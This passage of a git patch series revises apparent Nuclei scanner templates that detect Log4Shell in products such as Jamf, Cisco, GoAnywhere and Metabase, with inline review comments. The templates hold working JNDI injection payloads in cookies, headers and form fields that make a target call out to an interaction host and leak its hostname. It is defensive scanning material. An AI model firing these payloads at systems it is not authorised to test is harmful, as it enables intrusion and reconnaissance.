@@ -43,13 +47,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/04/05 From 05eb75398536c07f2acd54f3335d10a70adbc17b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 May 2023 11:05:06 +0530 Subject: [PATCH 07/10] Update apache-ofbiz-log4j-rce.yaml --- .../apache/apache-ofbiz-log4j-rce.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index b5b082566d5..a76f12528b9 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml @@ -30,7 +30,7 @@ http: - | GET /webtools/control/main HTTP/1.1 Host: {{Hostname}} - Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}} + Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}} matchers-condition: and matchers: 
@@ -45,6 +45,16 @@ http: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 From f96e98052e0e040b31ed6cf9fdba70da7980a9a3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Mon, 8 May 2023 11:07:00 +0530 Subject: [PATCH 08/10] payload update --- http/cves/2021/CVE-2021-45046.yaml | 10 +++++++--- .../apache/log4j/jamf-pro-log4j-rce.yaml | 12 +++++++++++- .../cisco/cisco-cloudcenter-suite-log4j-rce.yaml | 2 +- .../cisco/cisco-unified-communications-log4j.yaml | 8 +++++++- http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml | 2 +- http/vulnerabilities/code42/code42-log4j-rce.yaml | 2 +- http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml | 2 +- .../mobileiron/mobileiron-log4j-jndi-rce.yaml | 2 +- .../other/elasticsearch5-log4j-rce.yaml | 2 +- .../other/goanywhere-mft-log4j-rce.yaml | 2 +- http/vulnerabilities/other/graylog-log4j.yaml | 2 +- http/vulnerabilities/other/metabase-log4j.yaml | 2 +- 12 files changed, 34 insertions(+), 14 deletions(-) diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 5b0a05a870b..3022c593387 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml 
@@ -52,19 +52,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + - type: regex part: interactsh_request group: 2 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/02/28 diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml index da77e938cc7..fa5dad61172 100644 --- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml +++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml @@ -35,7 +35,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: 
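Review bot: The matcher and extractor regexes in the CVE-2021-45046 hunk now require six leading digits (`\d{6}\.`) ahead of `${hostName}`, but the request line that would produce them is not in this hunk, and the diffstat for http/cves/2021/CVE-2021-45046.yaml (7 insertions, 3 deletions) is accounted for entirely by the lines shown here. Unless an earlier patch in the series already added the `variables:` block and the `${:-{{rand1}}}${:-{{rand2}}}.` prefix to that template's payload, the callback will arrive without the digits, the `and`-combined matcher never fires, and the template silently stops detecting a vulnerable host. The payload and the rest of the `http:` section lie outside the hunk, so this is worth checking in the same file before merging.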
@@ -55,6 +55,16 @@ http: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml index d25ab91b691..3ae7726c647 100644 --- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml @@ -31,7 +31,7 @@ http: @timeout: 10s POST /suite-auth/login HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}} + Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} Content-Type: application/json {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml index 135e266a538..92807fdaab7 100644 --- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml @@ -32,7 +32,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/ccmadmin/showHome.do - appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=admin + appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: 
@@ -51,6 +51,12 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 diff --git a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml index dfce16b4afc..1f57d654108 100644 --- a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml @@ -33,7 +33,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=admin&submit=Log+In + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In matchers-condition: and matchers: diff --git a/http/vulnerabilities/code42/code42-log4j-rce.yaml b/http/vulnerabilities/code42/code42-log4j-rce.yaml index abbd0c80d8a..63874df01bd 100644 --- a/http/vulnerabilities/code42/code42-log4j-rce.yaml +++ b/http/vulnerabilities/code42/code42-log4j-rce.yaml @@ -29,7 +29,7 @@ variables: http: - method: GET path: - - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&url=https://localhost' + - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost' matchers-condition: and matchers: diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index a54153a2519..96484eaa58c 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml 
@@ -34,7 +34,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index 7ac2f291001..09a84db2757 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -33,7 +33,7 @@ http: Referer: {{RootURL}}/mifs/user/login.jsp Content-Type: application/x-www-form-urlencoded - j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=password&logincontext=employee + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee matchers-condition: and matchers: diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index aafce277c43..b7850d65953 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -27,7 +27,7 @@ variables: http: - raw: - | - GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D HTTP/1.1 + GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1 Host: {{Hostname}} { diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml index 6688348f264..40f6be06556 100644 --- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml 
+++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml @@ -36,7 +36,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/goanywhere/auth/Login.xhtml - formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} + formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} cookie-reuse: true matchers-condition: and diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index 982527b8fe9..463c6fce764 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml @@ -35,7 +35,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} + {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} matchers-condition: and matchers: diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml index bd2d6791423..1603042be74 100644 --- a/http/vulnerabilities/other/metabase-log4j.yaml +++ b/http/vulnerabilities/other/metabase-log4j.yaml @@ -26,7 +26,7 @@ variables: http: - method: GET path: - - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}" + - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}" matchers-condition: and matchers: 
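Review bot: The rewritten form body in the goanywhere hunk still contains `formPanel%3AloginGrid%3Avalue={{view}}}`, a third closing brace after the `{{view}}` variable, so a stray `}` is appended to the `value` field on every request. It was already present on the old line, but this rewrite of the same line is the natural place to drop it: `...&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}`. If the extra brace is deliberate, a comment on the line would save the next reader the same double-take.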
From 812fb97fe7cb130dd6a21d21f3eba3c161f07072 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 May 2023 00:05:20 +0530 Subject: [PATCH 09/10] Delete .new-additions --- .new-additions | 55 -------------------------------------------------- 1 file changed, 55 deletions(-) delete mode 100644 .new-additions diff --git a/.new-additions b/.new-additions deleted file mode 100644 index 7d2c21d7bc0..00000000000 --- a/.new-additions +++ /dev/null 
@@ -1,55 +0,0 @@ -cves/2017/CVE-2017-16894.yaml -cves/2020/CVE-2020-10199.yaml -cves/2021/CVE-2021-25078.yaml -cves/2021/CVE-2021-35250.yaml -cves/2022/CVE-2022-0747.yaml -cves/2022/CVE-2022-0769.yaml -cves/2022/CVE-2022-0773.yaml -cves/2022/CVE-2022-0846.yaml -cves/2022/CVE-2022-0864.yaml -cves/2022/CVE-2022-1903.yaml -cves/2022/CVE-2022-2219.yaml -cves/2022/CVE-2022-24223.yaml -cves/2022/CVE-2022-25485.yaml -cves/2022/CVE-2022-25486.yaml -cves/2022/CVE-2022-25487.yaml -cves/2022/CVE-2022-25488.yaml -cves/2022/CVE-2022-25489.yaml -cves/2022/CVE-2022-25497.yaml -cves/2022/CVE-2022-27926.yaml -cves/2022/CVE-2022-28032.yaml -cves/2022/CVE-2022-3062.yaml -cves/2022/CVE-2022-37190.yaml -cves/2022/CVE-2022-37191.yaml -cves/2022/CVE-2022-38295.yaml -cves/2022/CVE-2022-38296.yaml -cves/2022/CVE-2022-38467.yaml -cves/2022/CVE-2022-41441.yaml -cves/2022/CVE-2022-42094.yaml -cves/2022/CVE-2022-4321.yaml -cves/2023/CVE-2023-0099.yaml -cves/2023/CVE-2023-22620.yaml -cves/2023/CVE-2023-22897.yaml -cves/2023/CVE-2023-27008.yaml -cves/2023/CVE-2023-27159.yaml -cves/2023/CVE-2023-27179.yaml -cves/2023/CVE-2023-29084.yaml -default-logins/trassir/trassir-default-login.yaml -exposed-panels/appwrite-panel.yaml -exposed-panels/aspect-control-panel.yaml -exposures/logs/yii-error-page.yaml -misconfiguration/apollo-adminservice-unauth.yaml -misconfiguration/default-spx-key.yaml -misconfiguration/sql-server-report-viewer.yaml -misconfiguration/thinkphp-errors.yaml -network/detection/msmq-detect.yaml -network/enumeration/beanstalk-service.yaml -osint/hashnode.yaml -osint/imgbb.yaml -osint/rubygems.yaml -technologies/default-apache-shiro.yaml -technologies/switch-protocol.yaml -vulnerabilities/generic/cache-poisoning-xss.yaml -vulnerabilities/huawei/huawei-firewall-lfi.yaml -vulnerabilities/others/universal-media-xss.yaml -vulnerabilities/wordpress/ldap-wp-login-xss.yaml From a40d92e53b3f9650e476aa54df2dab3da6c57432 Mon Sep 17 00:00:00 2001 
From: Ritik Chaddha Date: Thu, 11 May 2023 13:09:54 +0530 Subject: [PATCH 10/10] Revert "Delete .new-additions" This reverts commit 812fb97fe7cb130dd6a21d21f3eba3c161f07072. --- .new-additions | 55 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 .new-additions diff --git a/.new-additions b/.new-additions new file mode 100644 index 00000000000..7d2c21d7bc0 --- /dev/null +++ b/.new-additions 
@@ -0,0 +1,55 @@ +cves/2017/CVE-2017-16894.yaml +cves/2020/CVE-2020-10199.yaml +cves/2021/CVE-2021-25078.yaml +cves/2021/CVE-2021-35250.yaml +cves/2022/CVE-2022-0747.yaml +cves/2022/CVE-2022-0769.yaml +cves/2022/CVE-2022-0773.yaml +cves/2022/CVE-2022-0846.yaml +cves/2022/CVE-2022-0864.yaml +cves/2022/CVE-2022-1903.yaml +cves/2022/CVE-2022-2219.yaml +cves/2022/CVE-2022-24223.yaml +cves/2022/CVE-2022-25485.yaml +cves/2022/CVE-2022-25486.yaml +cves/2022/CVE-2022-25487.yaml +cves/2022/CVE-2022-25488.yaml +cves/2022/CVE-2022-25489.yaml +cves/2022/CVE-2022-25497.yaml +cves/2022/CVE-2022-27926.yaml +cves/2022/CVE-2022-28032.yaml +cves/2022/CVE-2022-3062.yaml +cves/2022/CVE-2022-37190.yaml +cves/2022/CVE-2022-37191.yaml +cves/2022/CVE-2022-38295.yaml +cves/2022/CVE-2022-38296.yaml +cves/2022/CVE-2022-38467.yaml +cves/2022/CVE-2022-41441.yaml +cves/2022/CVE-2022-42094.yaml +cves/2022/CVE-2022-4321.yaml +cves/2023/CVE-2023-0099.yaml +cves/2023/CVE-2023-22620.yaml +cves/2023/CVE-2023-22897.yaml +cves/2023/CVE-2023-27008.yaml +cves/2023/CVE-2023-27159.yaml +cves/2023/CVE-2023-27179.yaml +cves/2023/CVE-2023-29084.yaml +default-logins/trassir/trassir-default-login.yaml +exposed-panels/appwrite-panel.yaml +exposed-panels/aspect-control-panel.yaml +exposures/logs/yii-error-page.yaml +misconfiguration/apollo-adminservice-unauth.yaml +misconfiguration/default-spx-key.yaml +misconfiguration/sql-server-report-viewer.yaml +misconfiguration/thinkphp-errors.yaml +network/detection/msmq-detect.yaml +network/enumeration/beanstalk-service.yaml +osint/hashnode.yaml +osint/imgbb.yaml +osint/rubygems.yaml +technologies/default-apache-shiro.yaml +technologies/switch-protocol.yaml +vulnerabilities/generic/cache-poisoning-xss.yaml +vulnerabilities/huawei/huawei-firewall-lfi.yaml +vulnerabilities/others/universal-media-xss.yaml +vulnerabilities/wordpress/ldap-wp-login-xss.yaml